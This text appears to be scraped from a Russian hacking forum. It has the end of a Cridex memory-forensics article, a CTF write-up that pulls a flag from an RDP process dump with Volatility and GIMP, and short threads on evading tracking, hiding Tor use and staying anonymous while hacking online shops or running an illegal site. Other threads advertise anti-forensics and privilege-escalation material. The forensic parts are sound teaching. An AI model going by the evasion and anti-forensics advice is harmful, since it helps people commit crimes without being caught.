Как видите, единственное значение, который было недавно изменено, - «\Device\HarddiskVolume1\Documents and Settings\Robert\NTUSER.DAT». Убедимся, что исполняемый файл с именем «KB00207877.exe» действительно связан с нашим трояном:

Code:Copy to clipboard

$ strings 1640.dmp | grep -Fi "KB00207877.exe" KB00207877.exe C:\Documents and Settings\Robert\Application Data\KB00207877.exe(, KB00207877.EXEn KB00207877.exe KB00207877.exe C:\Documents and Settings\Robert\Application Data\KB00207877.exe(,

Поскольку эта строка действительно присутствует в искомом файле, теперь мы можем смело утверждать, что Cridex изменил стартовый ключ реестра компьютера жертвы, чтобы он стал постоянным. Удаление «KB00207877.exe» необходимо для "обеззараживания" машины.

Резюме

На этом базовый анализ вредоноса Cridex подошел к концу. Надеюсь, вам понравился моя статья! Ниже приводится краткое изложение различных команд Volatility, используемых для анализа сегодняшнего дампа:

Code:Copy to clipboard

# Какой тип дампа я собираюсь анализировать $ volatility -f MyDump.dmp imageinfo # Какие процессы были запущены $ volatility -f MyDump.dmp --profile=MyProfile pslist $ volatility -f MyDump.dmp --profile=MyProfile pstree $ volatility -f MyDump.dmp --profile=MyProfile psxview # Список открытых TCP/UDP соединений $ volatility -f MyDump.dmp --profile=MyProfile connscan $ volatility -f MyDump.dmp --profile=MyProfile sockets $ volatility -f MyDump.dmp --profile=MyProfile netscan # Какие команды выполнялись на компьютере $ volatility -f MyDump.dmp --profile=MyProfile cmdline $ volatility -f MyDump.dmp --profile=MyProfile consoles $ volatility -f MyDump.dmp --profile=MyProfile cmdscan # Дамп .exe процесса и его памяти $ volatility -f MyDump.dmp --profile=MyProfile procdump -p MyPid --dump-dir . $ volatility -f MyDump.dmp --profile=MyProfile memdump -p MyPid --dump-dir . # Ветки и значения ключей регистра $ volatility -f MyDump.dmp --profile=MyProfile hivelist $ volatility -f MyDump.dmp --profile=MyProfile printkey -K "MyPath"

Автор Moody
Переведено и адаптировано специально для @cybred

Сложность отслеживания 4G-модема

ID: 676533bbb4103b69df371bf6
Thread ID: 51912
Created: 2021-05-18T19:34:10+0000
Last Post: 2021-05-21T15:24:02+0000
Author: Kail Battler
Replies: 22 Views: 2K

Интересует проблема пеленгации 4G-модемов в плане анонимности. Насколько точно можно опеределить местоположение? Может кто-то заказывал пробивы на них и знает что может видеть сотовый оператор или можно точно запеленговать с помощью специальной аппаратуры, если оператор даёт примерное местоположение?

Можно ли идентифицировать человека по фото пальца в интернете?

ID: 676533bbb4103b69df371bfd
Thread ID: 45881
Created: 2020-12-22T17:03:51+0000
Last Post: 2021-05-13T03:33:58+0000
Author: tipokipocod
Replies: 17 Views: 2K

Палец/рука. Возможно ли это?

Способы скрытия факта подключения к сети TOR

ID: 676533bbb4103b69df371c03
Thread ID: 51149
Created: 2021-04-27T19:39:42+0000
Last Post: 2021-05-05T03:42:50+0000
Author: dontknowend
Replies: 34 Views: 2K

Приветствую! Такой вопрос - провайдер по сути видит, что я подключаюсь к сети тора, а если использовать мосты, то что он видит ?
А если VPN ? Есть какие нибудь способы сокрытия факта подключения к VPN ?
Ведь он может помечать весь мой трафик, как необычный, а внимание, сами понимаете, не к чему. Заранее благодарю за ответы!

Форензика. Извлекаем пароль из дампа памяти с помощью Volatility и GIMP

ID: 676533bbb4103b69df371c08
Thread ID: 50726
Created: 2021-04-16T14:50:33+0000
Last Post: 2021-04-16T14:50:33+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 2K

Задачи на форензику (криминалистику) в соревнованиях Capture The Flag делятся на несколько больших типов: анализ оперативной памяти, жесткого диска и исследование дампов трафика. В этой статье мы разберем задачу Remote Password Manager на тему анализа памяти из соревнования JustCTF 2021, а заодно рассмотрим малоизвестную, но очень полезную фишку GIMP.

ЧТО ДЕЛАЕМ?

Анализ оперативной памяти часто используется, когда у нас был физический доступ к машине и получилось снять слепок оперативной памяти. По нему можно определить, какие приложения запускались во время этого сеанса, потому что, пока человек не выключил или не перезагрузил компьютер, в оперативной памяти хранится интересующая нас информация (например, данные процессов).

Еще интересные данные можно найти в файлах подкачки (pagefile.sys) и гибернации (hiberfil.sys). Для *nix-based-систем стоит поискать в swap- разделе.

Для анализа дампов памяти существует несколько приложений, которые на слуху у всех, кто хоть раз имел дело с задачами на форензику: это Volatility, Memoryze и Autopsy (в связке с Volatility). Есть, конечно, и другие, но подробно мы на них останавливаться не будем.

Крупные решения вроде Autopsy хороши тем, что позволяют произвести комплексный анализ всего слепка одной кнопкой, однако цена за это — большое время работы программы. На соревнованиях обычно необходимо делать задачу максимально быстро, поэтому использовать мы будем Volatility.

ЗАДАНИЕ

Вот как выглядело условие задачи. Нам дан непосредственно слепок оперативной памяти и его хеш MD5 для проверки.

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19172%2Fdescription.jpg&hash=67299e82c0898fca3316e5d3974de558)
Приблизительный перевод:

У меня есть самый безопасный менеджер паролей. Даже если ты украдешь мой ноутбук, ты не сможешь узнать мои секреты.
Подсказка: Удаленный не значит обязательно браузер

Click to expand...

Закачаем наш образ на машину, где будем проводить анализ (у меня это Kali):

Code:Copy to clipboard

$ wget https://ams3.digitaloceanspaces.com/justctf/69f7647d-2f7a-4604-b9f6-553c6bb447ee/challenge.tar.gz

Распакуем:

Code:Copy to clipboard

$ tar -xzvf challenge.tar.gz

И сразу же проверим, что с ним все в порядке:

Code:Copy to clipboard

$ md5sum pub/challenge.vmem

Если хеш не сошелся с исходным хешем — придется еще раз скачать архив.

О важности актуальных версий

Ни для кого не секрет, что с каждым обновлением любого инструмента разработчики стараются добавить новые возможности и убрать старые недокументированные возможности баги. В операционных системах семейства Linux есть встроенные менеджеры пакетов, которые существенно упрощают установку и обновление программ. Из‑за этого большинство людей первым делом лезет в свой пакетный менеджер, чтобы установить оттуда программу.

Однако здесь есть небольшие шероховатости: разработчик может забыть (или забить?) обновить пакет в репозитории. В таких случаях приходится искать исходники и собирать актуальную версию самостоятельно.

Те, кто знаком с Volatility, знают о его особенностях. Например, что он использует так называемые профили, которые позволяют правильно распарсить весь слепок оперативной памяти, и энтузиасты постоянно обновляют их список. Разумеется, профиль можно сделать и [самостоятельно](https://www.andreafortuna.org/2019/08/22/how-to-generate-a- volatility-profile-for-a-linux-system/), но явно проще воспользоваться готовыми. Во время соревнования я столкнулся с тем, что давно не обновлял свой Volatility и нужных профилей для решения задачи у меня не оказалось.

Чтобы с тобой не случилось подобного, перед началом решения задачи я настоятельно рекомендую обновить (или установить) Volatility с гитхаба проекта.

ОПРЕДЕЛЯЕМ ПРОФИЛЬ

Первым делом нам необходимо определить версию операционной системы, с которой снимали слепок. Это можно сделать командой imageinfo:

Code:Copy to clipboard

$ vol.py -f challenge.vmem imageinfo

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19175%2Fimageinfo.jpg&hash=6e88eabc2676490164274fe40da8fae6)
Нам нужно обратить внимание на строчку с Suggested Profile(s). Именно здесь нам говорят, что предполагаемый профиль слепка оперативной памяти — Win10x64_18362. Теперь мы должны указывать аргумент --profile Win10x64_18362 для последующих команд.

Полная документация по Volatility есть в Wiki по инструменту на GitHub.

СОБИРАЕМ ИНФОРМАЦИЮ О МАШИНЕ

Какую информацию имеет смысл добыть вначале? Обычно это:

процессы;

история браузера;

история запущенных команд в консоли.

Этих трех пунктов хватает для определения вектора дальнейшей разведки.

Процессы

Чтобы найти процессы, нам достаточно использовать команду pstree. Есть еще pslist, но первая команда удобнее, потому что показывает процессы в виде дерева — так намного проще понять, на какие из них стоит обратить внимание.

Code:Copy to clipboard

$ vol.py -f challenge.vmem --profile Win10x64_18362 pstree

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19181%2Fpstree-1.jpg&hash=ff89d571b2f3fd932382c5bb4bed4bdc)
Ничего бросающегося в глаза, вроде pswd_manager.exe или not_a_virus.exe, не видно, поэтому продолжим нашу разведку.

История браузера

Хоть в хинте и говорилось, что «удаленный» не обязательно значит «браузер», мы проверим этот вектор. В Volatility есть готовый плагин для просмотра истории Internet Explorer — iehistory. И не говори, что им уже никто не пользуется!

Code:Copy to clipboard

$ vol.py -f challenge.vmem --profile Win10x64_18362 iehistory

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19174%2Fiehistory.jpg&hash=a0b6ed622306f9d4d8d9f789498cd2f6)
Команда работала слишком долго на моей машине (порядка 20 минут) и завершаться не планировала. Это не считается нормальным поведением для Volatility, следовательно, тут искать нечего.

Если ты подумаешь составлять задачки для CTF — имей в виду, что задачи, в которых надо по полчаса брутить извращенные пароли или искать неуловимый API endpoint, никто не любит, и следующую задачу тебе доверят делать еще не скоро.

Список команд в консоли

Есть еще одна удобная функция для проверки всех введенных в консоль команд. Возможно, пользователь запускал что‑нибудь из консоли или хранил там важные данные (например, флаг). Проверить все из консоли можно с помощью команды cmdscan.

Code:Copy to clipboard

$ vol.py -f challenge.vmem --profile Win10x6_18362 cmdscan

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19171%2Fcmdscan.jpg&hash=144c28ed75aaa02d95eee387e33949cf)
Тут чисто — следовательно, терминал тоже не при делах.

Что еще можно сделать?

Поскольку до сих пор не нашлось ничего интересного — мы что‑то упустили. Можно применить еще один полезный прием при анализе оперативной памяти — посмотреть на скриншот рабочего стола. Помогает он не сильно часто, но позволяет увидеть более полную картину.

Сделать скриншот всех окон процессов в системе можно при помощи команды screenshot. Обязательно нужно указать существующую конечную директорию, где будут находиться все снимки. Важно понимать, что большинство картинок будут пустыми: это связано с тем, что не все окна вообще могут отображаться (для лучшего понимания рекомендую ознакомиться с [документацией](https://volatility-labs.blogspot.com/2012/10/movp-43-taking- screenshots-from-memory.html?m=1)).

Code:Copy to clipboard

$ vol.py -f challenge.vmem --profile Win10x64_18362 screenshot -D shot/

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19182%2Fscreenshot.jpg&hash=e98cf6df399f60eb7757be1bbde938d6)
К сожалению, команда заканчивается с ошибкой, так что этот трюк тоже не прошел и нам стоит вернуться к самому началу.

ПЕРЕПРОВЕРЯЕМ ИНФОРМАЦИЮ

В названии задачи фигурирует слово remote (удаленный) — давай попробуем найти что‑то, что может взаимодействовать с сетью.

Попробуем снова проверить все процессы, которые у нас фигурируют в этом слепке оперативной памяти. Заметим среди них mstsc.exe — Microsoft Terminal Services Client, или, в простонародье, RDP-клиент. RDP — это проприетарный протокол для доступа к удаленным рабочим столам. Для нас важно то, что протокол предусматривает передачу картинки по кадрам в виде сжатых битмапов, которые разжимаются и отображаются, а в это время хранятся в памяти.

Возможно, в этом процессе мы сможем найти флаг. Найдем его PID, чтобы мы могли сдампить память процесса:

Code:Copy to clipboard

$ vol.py -f challenge.vmem --profile Win10x64_18362 pslist | grep mstsc.exe

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19180%2Fpslist- grep.jpg&hash=0dc94a09b71d9eb737a170390b105eed)
Номер процесса — 6484.

ДАМПИМ ПАМЯТЬ

У каждого процесса есть своя выделенная память, которая хранится как раз в оперативке (внезапно, не так ли?). Попробуем сдампить ее, чтобы найти полезную информацию из этого процесса.

Code:Copy to clipboard

$ vol.py -f challenge.vmem --profile Win10x64_18362 memdump -p 6484 -D data

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19176%2Fmemdump.jpg&hash=f157f5eec271a0a2ba7dad4574e363fb)

Хранение картинок в памяти

Напоминаю, что mstsc.exe (да и другие RDP-клиенты тоже) получают картинку , которую хранят у себя где‑то в оперативной памяти. Благодаря этой особенности мы можем попробовать извлечь картинку из этого дампа процесса. Возникнет только одна небольшая проблема: правильно подобрать смещение, так как картинка в памяти процесса хранится в сыром виде, и ни binwalk, ни foremost не могут ее отыскать, чтобы сохранить как отдельный файл.

Такой трюк можно применять не только для процесса mstsc.exe, но и на процессы вроде mspaint.exe, virtualbox.exe и другие, которые работают примерно по такому же принципу.

Для подбора смещения расчехляем графический редактор GIMP. Как прочитать картинку, если она начинается не в начале файла? Да запросто!

Нужно открыть дамп процесса как Raw Image Data, то есть как сырую картинку, иначе мы не сможем подбирать смещение.

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19173%2Fgimp- open.jpg&hash=13864219226bdc2aef8895c3af034319)
Дальше появляется окошко, где мы можем выбирать смещение.

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19177%2Foffset-0.jpg&hash=68ecbd6f75a0304429c061ef05eeb7cf)
И начинаем его прокручивать. Для удобства я увеличил свое окошко по ширине, чтобы было легче управлять ползунком. Во время перемещения я заметил следующую картинку, которая похожа на кусок рабочего стола Windows, что наводит на мысль о близости к флагу.

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19178%2Foffset-1.jpg&hash=a4802d71b07cd807a06ea86a08caa8c8)
Подкрутим еще немного и скорректируем размер по ширине.

![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F48e46b8c56852ae4c4d8ca7b19a3e957%2F19179%2Foffset-2.jpg&hash=c820d417f15ad591b258fbc1ad3197df)
А вот и флаг!

КРАТКИЕ ВЫВОДЫ

Перед решением любых задач не забывай обновлять используемые утилиты! Не обновив утилиту или неправильно прочитав документацию к ней, можно попасть в rabbit hole и не сдать задачу вовремя. А как мы знаем, не бывает поздно, бывает уже не надо.

Полезные ссылки

Еще один пример использования GIMP и Volatility в CTF

Извлечение сырых картинок из дампов памяти

Задача For1 с Google CTF 2016

Автор Артем Кадушко aka @herrlestrate

Поговорим про безопасность касаемо черного пентеста

ID: 676533bbb4103b69df371c10
Thread ID: 49889
Created: 2021-03-26T05:56:03+0000
Last Post: 2021-04-06T14:19:20+0000
Author: senegal55
Replies: 8 Views: 2K

Я парень простой, из тех что любит жизнь. Что насчет максимальной защиты сети при взломе? Взлом средних сайтов , например интернет магазин какой нибудь. Что насчет разового интернет модема + симки левой + поддельный мак + VPN и ТОР? Какой шанс не сесть на бутылку правосудия? И какие методы защиты у вас касаемо черного хакинга? Не профи по этой теме поэтому если написал какую нибудь чепуху прошу простить, только учусь да и все знать невозможно

Как удалять уже удаленные файлы?

ID: 676533bbb4103b69df371c18
Thread ID: 46817
Created: 2021-01-15T22:15:57+0000
Last Post: 2021-03-24T01:54:51+0000
Author: d_qu
Replies: 20 Views: 2K

Есть ли программа которая полностью удаляет файлы с компьютера, как шредер?

Privilege escalation automated script Windows & Linux

ID: 676533bbb4103b69df371c1e
Thread ID: 49428
Created: 2021-03-16T17:47:49+0000
Last Post: 2021-03-16T17:47:49+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 2K

When an attacker attacks a Windows Operating System most of the time they will get a base shell or meterpreter session. This shell is limited in the actions it can perform. So, to elevate privileges, we need to enumerate different files, directories, permissions, logs and SAM files. The number of files inside a Windows OS is very overwhelming. Hence, doing this task manually is very difficult even when you know where to look. So, why not automate this task using scripts. When an attacker attacks a Linux Operating System most of the time they will get a base shell which can be converted into a TTY shell or meterpreter session. This shell is limited in the actions it can perform. So, to elevate privileges, we need to enumerate different files, directories, permissions, logs and /etc/passwd files. The number of files inside any Linux System is very overwhelming. Hence, doing this task manually is very difficult even when you know where to look. So, why not automate this task using scripts. Privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he tries to gather critical information related to systems such as hidden password and weak configured services or applications, etc. All this information helps the attacker to make the post exploit against the machine for getting the higher-privileged shell. In this article, we will shed light on some of the automated scripts that can be used to perform Post Exploitation and Enumeration after getting initial accesses to Windows OS based Devices

[ Privilege escalation automated script Windows & Linux.pdf

](https://cloud.mail.ru/public/NfRX/jrbj1wXEG)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Как анонимно и безопасно создать сайт в домашних условиях ?

ID: 676533bbb4103b69df371c1f
Thread ID: 49106
Created: 2021-03-08T19:58:07+0000
Last Post: 2021-03-16T00:20:44+0000
Author: SlavaM
Replies: 16 Views: 2K

Уважаемые гуру, читаю темы, много интересного, но обывательским умом не во всё выезжаю, что то понимаю, но не моя специфика. Но чем больше читаю тем больше запутываюсь.

Исходные данные.
Нужно создать сайт, админить его, но что бы с домашнего компа анонимно и безопасно. Не кидайтесь в меня ни чем, как умею так объясняю)
Нужно поставитьс чистого листа систему, создать виртуальную машину, в ней установить и запустить ВПН и потом ТОР.

Для анонимных платежей присматриваюсь к perfectmany. регистрация только эмейлу.
Хостинг. В нете находил украинские хостинги, ребята сказали что можно спокойно у них но надо на ВПС виртуальный только, рег домена от них бесплатно и номер телефона не нужен. единственно если съехать на другого хостера захочу то тогда проблемы с доменом будут.
Для быстрого общения телеграм бы, но там что то какие то сложности, он может сбрыкнуть и сам на какое то мгновение уйти на прямую через провайдера, ну я так понял. Есть джабра. ННо я не помню уже что это такое, да обычные обыватели сейчас знают вацап и телеграм. с жаброй проблемно всем объяснять.

Тематика сайта не наркотики , не терроризм, не связано с детьми. Фривольного направления но все же это вне закона. Не хочется что бы доблестные могли выяснить и определить кто создатель и админ.

Прошу отнестись с пониманием и снисходительно )
Буду благодарен всем советам, рекомендациям, ссылкам и опытом которым поделяться.
Спасибо!

Пароли. Создание и хранение

ID: 676533bbb4103b69df371c27
Thread ID: 49029
Created: 2021-03-06T22:04:24+0000
Last Post: 2021-03-06T22:04:24+0000
Author: Benihowy
Prefix: Статья
Replies: 0 Views: 2K

Пароль – это важный элемент безопасности любой системы. Рассмотрим обычный компьютер и пользователя, заботящегося о своей безопасности на высоком уровне. Найдем уязвимые места, например, к моим некоторым виртуальным машинам можно получить доступ из вне. Чтобы посторонний человек случайно или намерено не смог зайти на машину существует пароль (и файервол конечно). Для создания пароля можно воспользоваться легко запоминающейся фразой либо цифрой (часто день рождения). От этого нужно отдалятся. Пароль должен быть нейтрален, и его нельзя было подобрать, зная человека в реальной жизни. Этому могут поспособствовать генераторы паролей. Их просто тьма, как онлайн, так и офлайн. Тогда подойдем к другому вопросу – а где их хранить? Обычный пользователь не задумывается о хранении и очень часто хранит их в текстовом документе прямо на рабочем столе. Да, это удобно, они всегда под рукой, а в случаи заражения трояном – джек-пот для злоумышленника.

Есть несколько методов хранения.
- аналоговый, позволяет безопасно хранить пароли. Особенностью является ввод каждый раз пароля с тетрадки. Метод безопасен, когда пользователь один на один с тетрадкой.
- хранение в голове, наверное, считается самым безопасным. Только вот, редкое использование неких паролей привод к их забыванию.
- цифровой, наиболее распространен, который и будет рассмотрен.

Нужно создать хранилище, которое будет защищено в случаи проникновения, и при этом легко доступно самому пользователю. Нам потребуется виртуальная машина на другом хосте. На ней устанавливаем операционную систему. Затем используем один из многих менеджеров паролей. Например, Keepass отлично подойдет

Виртуальная машина не должна иметь связи с хостом, так же устанавливаем файервол (рекомендую agnitum). Блокируем любой входящий и исходящий трафик кроме удалённого доступа (например, vnc). Детальная настройка файервола рассказана в статье Анонимность и Безопасность в Сети ч2 – Роутер (шлюз). На доступ по vnc также требуется пароль, который можно сохранить (если есть опасность получения физического доступа посторонних, лучше не сохранят)

Теперь заходим на машину и открываем менеджер паролей, заполняем пароли. Создаем мастер пароль для Keepass. Как это работает? Заходим по vnc, затем в keepass. Находим соответствующий пароль и копируем в буфер обмена. Вводим пароль на сайте и закрываем vnc сессию.
Рассмотрим ситуацию, если кто-то получил физический доступ к реальной машине. Ему потребуется ваша помощь в нахождении информации. Что же касаемо виртуальной машины – некто не сможет получить к ней удалённый доступ незамеченным.
Как насчет заражения трояном реальной машины? Это вполне реально, и при передаче пароля буфером обмена он будет благополучно украден. Дабы избежать этого, полностью изолируем рабочую машину от доступа в интернет, можно это сделать с помощью файервола, либо через перенос интернет трафика в виртуализацию (браузер, мессенджер и тд.). Настройки файервола довольно просты, запрещаем все, кроме необходимого (например, firefox). Как настроить виртуализацию рассказано в статье Развертывание “анонимной цепочки” любой сложности на Hyper-V

Анонимность

ID: 676533bbb4103b69df371c2c
Thread ID: 37445
Created: 2020-05-18T00:25:15+0000
Last Post: 2021-02-28T18:41:25+0000
Author: negg
Replies: 7 Views: 2K

Я читал в некой статье,что базовый уровень защиты это - Клиент - VPN/TOR/SSH- тунель → СЕТЬ. А средний - Клиент → VPN → Тор → СЕТЬ. Является ли этой правдой в 2020? И каким впном пользоваться если ответ "да",имею ввиду как настроить индвидуальный,ведь все публичные впн сливают инфу

[Мефодий Келевра] Максимальный параноик v.2 (2021)

ID: 676533bbb4103b69df371c33
Thread ID: 48557
Created: 2021-02-24T12:09:53+0000
Last Post: 2021-02-24T12:09:53+0000
Author: DikTor
Prefix: Мануал/Книга
Replies: 0 Views: 2K

Автор: Мефодий Келевра
Название: Максимальный параноик v.2 (2021)

Чему вы научитесь:

Оставаться анонимными в сети

Освоим Kodachi как базовую рабочую систему

Два варианта установки Amnesia - вы закрыли крышку ноутбука, и результаты вышей работы достать нельзя.

Научимся прятать контейнеры внутри Amnesiac системы для большего комфорта работы не в ущерб безопасности.

Host Based - установим систему и настроим полностью анти форензик методы, включая красную кнопку для самоуничтожения.

Поднимем свой VPN для личных нужд и безопасности.

Поднимем свой дедик и безоасно настроим его, используя его как второе рабочее место, что бы все следы были там и не вели к Вам.

Для windows пользователей освоим Disk Cryptor с сумасшедшими методами анти брутфорса.

Так же научимся создавать Hidden OS в Vera Crypt. По одному паролю будет загрузка фейковой ОС, по второму скрытой, определить наличие фейковой ОС нельзя.

Требования:

Базовое владение Linux системами

Описание:

Привет друзья, Мефодий Келевра на связи!
И так встречайте, Maximum Paranoid v.2
Курс для тех кто ценит свои безопасность и конфеденциальность на максимальном уровне.
Будь то анонимная работа в сети, или же анти форензик экспертиза.

Курс ориентирован для тех кто знает зачем ему нужен максимальный уровень безопасности, конфиденциальности, при этом я максимально сконцентировался на комфорте полученного результата. Так что бы уровень безопасности, не шел в разрез с удобством пребывания внутри полученного, не побоюсь слова "Комплекса".

Можно сказать что данный курс, это логическое продолжение курса "За тобой не прийдут с болгаркой"

Чему мы научимся?

Оставаться анонимными в сети

Освоим Kodachi как базовую рабочую систему

Два варианта установки Amnesia - вы закрыли крышку ноутбука, и результаты вышей работы достать нельзя.

Научимся прятать контейнеры внутри Amnesiac системы для большего комфорта работы не в ущерб безопасности.

Host Based - установим систему и настроим полностью анти форензик методы, включая красную кнопку для самоуничтожения.

Поднимем свой VPN для личных нужд и безопасности.

Поднимем свой дедик и безопасно настроим его, используя его как второе рабочее место, что бы все следы были там и не вели к Вам.

Освоим Kodachi как базовую рабочую систему

Два варианта установки Amnesia - вы закрыли крышку ноутбука, и результаты вышей работы достать нельзя

Научимся прятать контейнеры внутри Amnesiac системы для большего комфорта работы не в ущерб безопасности

Host Based - установим систему и настроим полностью анти форензик методы, включая красную кнопку для самоуничтожения

Поднимем свой VPN для личных нужд и безопасности

Поднимем свой дедик и безопасно настроим его, используя его как второе рабочее место, что бы все следы были там и не вели к Вам.

Для windows пользователей освоим Disk Cryptor с сумасшедшими методами анти брутфорса.

Так же научимся создавать Hidden OS в Vera Crypt. По одному паролю будет загрузка фейковой ОС, по второму скрытой, определить наличие фейковой ОС нельзя.

Скачать:

Hidden content for authorized users.

You must spend at least 7 day(s) on the forum to view the content.

Папка из Облака Mail.ru

Облако Mail.ru - это ваше персональное надежное хранилище в интернете.

cloud.mail.ru

Анонимный виртуальный роутер

ID: 676533bbb4103b69df371c3a
Thread ID: 48308
Created: 2021-02-18T17:50:35+0000
Last Post: 2021-02-18T18:22:23+0000
Author: top
Prefix: Статья
Replies: 1 Views: 2K

Любая статья начинается с идеи...так и тут...
Скажем так: Анонимный интернет по шлюзу в виртуалку мы уже давно научились раздавать. (Whonix, Tortilla adapter, Tun2Socks, Double SSH Tunnel manager), но тут пришла в голову другая идея...

А что если раздать анонимный интернет из виртуалки на хост? Ведь это заменит любой дорогостоящий внешний анонимный роутер, да не то что заменит, сколько даст гораздо больше функционала и удобств в использовании.

Управлять виртуальным роутером одно удовольствие:

-Всё наглядно и просто и не нужно лезть в мозги какой-то коробочки для смены IP адреса или прописывать там IP адрес нового ssh/socks/vpn/tor так как переключение сети осуществляется по клику в другом окне виртуальной машины.

-Интерент по шлюзу может быть не только по одному вашему предпочтительному IP адресу, но и сепарированный к примеру сайты TOR в зоне Onion могут открываться в обычных браузерах так как эти запросы пойдут в Tor прокси.

-На запросы по WEBRTC виртуальный роутер будет отдавать IP вашего SSH/Socks5

-Можно замедлить подключение по таймауту чтобы обойти двусторонний Ping на некоторых сайтах.

-DNS запросы идут исключительно по TCP каналам через TOR/Socks - с использованием утилиты Acrylic DNS Proxy

-Можно использовать WI-FI и это будет безопасно так как сам радиопередатчик будет в том же Виртуальном роутере- в изолированной машине.

-С таким роутером можно подключать локальные соединения которые создают различные утилиты. Пример: (Back-Connect Proxy)

-Любой анонимный роутер требует некоторых мощностей. Здесь вы сами себе хозяин. Вы сами выделяете столько памяти сколько вам для этого нужно...
Почему я это взял в сравнение ? Как правило, любой роутер затачивается под транслирование интернета который ему подается...
А если он прошит прошивкой и внутри данного устройства происходит процесс шифрования/расшифрованния трафика и стоят сторонние утилиты, то внутреннего процессора данного роутера может быть не достаточно. Вследствие чего могут появиться тормоза в соединениях, разрывы и прочее.

Все то что я сказал выше - это мое видение ситуации. Если у вас другое мнение, то я лучше соглашусь с вами чем начинать какой-то спор !

Данная статья сделает ваш Ноутбук под операционной системой (Mac-OS, Windows, Linux) полностью анонимным и при этом мобильным, и ничего лишнего из него торчать не будет так как само устройство выглядит как USB заглушка в вашем ноуте.
Сама идея летала давно, и она осуществлена в данной статье. Эта статья убивает весь смысл в покупке "некой" коробочки которая будет раздавать анонимный интернет.

Поехали...
У вас есть ноутбук под вашей операционной системой. Вы устанавливаете в ноутбук Virtualbox или VMware кому что нравится.
Далее в вашем ноутбуке отключаете Ethernet адаптер (для фанатиков: Ethernet вход можете его хоть герметиком заклеить, он вам не понадобится)
Далее в вашем ноутбуке отключаете вашу встроенную Wi-FI карту (для фанатиков: откручиваем отверткой с корпуса ноутбука - выкидываем)

Дельнейшие действия: В виртуальную машину вашей OS устанавливаем OS win 10 (отключаем UAC, обновление, и тд и тп. Также не забываем зайти в электропитание и настроить чтобы он у нас не засыпал. Желательно выделить под виртуальную OS 4 гб оперативы)
Далее вставляем в ваш ноутбук USB Wi-FI адаптер и прокидываем его в виртуальную машину (любое USB устройство можно пробросить в виртуальную машину)

В итоге у нас получается следующая картина: Ноутбук с вашей OS на нем... в этой OS стоит виртуалка под WIN 10 с подключенным интернетом по WI-FI (вообще какой будет интернет приходить в вашу виртуалку выбирайте сами. Это ваш выбор... оптимально все же для себя я вижу mini USB WI-FI заглушку)

К настройке на хосте мы еще вернемся, а пока все настройки у нас будут на виртуальной машине.

Скачиваем и запускаем Double SSH Tunnel Manager.

В настройках Double SSH Tunnel Manager смотрим на эти данные. При необходимости меняем на желаемые (эти данные нужно перенести на хостовую машину в адаптер от Virtualbox или от VMware)

Возвращаемся на хостовую машину.

Настройки для Virtualbox

Оставляем только две галочки, меняем настройки (TCP/IP4) на те что мы видели в Double SSH Tunnel Manager в разделе DHCP, в настройках самой виртуальной машины меняем дефолтную сеть NAT на VirtualBox Host-only Ethernet Adapter

Настройки для Vmware

Оставляем только две галочки, меняем настройки (TCP/IP4) на те что мы видели в Double SSH Tunnel Manager в разделе DHCP, в настройках самой виртуальной машины меняем дефолтную сеть NAT на VMnet1 (Host-only). Адаптер VMware Network Adapter VMnet8 отключаем

Далее возвращаемся на нашу виртуальную машину... Не забываем подключать к ней интернет через USB. Запускаем Double SSH Tunnel Manager выставляем настройки напротив ваших SSH/Socks как показано на рисунке ниже. Подключаемся и проверяем интернет на ХОСТЕ !!!

Для того чтобы транслировать полностью сеть TOR направьте ползунок вниз на Tor Ethernet, но сначала убедитесь что вы подключены к сети Tor (зеленая луковица)

PS: Если интернет не запустился перезагрузите виртуалку и включите выключите адаптер на хосте.

Автор @sshmanager

Firefox для пентестера: дополнения для конфиденциальности и защиты

ID: 676533bbb4103b69df371c42
Thread ID: 43857
Created: 2020-11-03T08:49:44+0000
Last Post: 2021-02-12T19:25:30+0000
Author: yashechka
Prefix: Статья
Replies: 4 Views: 2K

В сегодняшней статье мы научимся защищать себя в Интернете. Firefox - это веб- браузер, разработанный Mozilla. Благодаря последнему квантовому обновлению он обеспечивает улучшенную скорость и уникальный дизайн. Firefox - потрясающий веб-браузер, удобный и настраиваемый. Когда мы говорим о пентестерах или аналитиках безопасности; Firefox - лучший браузер для этого. У него есть различные надстройки, которые помогают нам защищать нас в Интернете и позволяют сохранять конфиденциальность после разоблачений Сноудена. Интернет сам по себе является большим неизвестным и самым ненадежным миром. Примерно каждый месяц происходят утечки данных и атаки вредоносных программ, таких как программы-вымогатели, и в остальном вы никогда не будете в безопасности. Различные веб-сайты захватывают ваши данные, личную информацию и так далее.
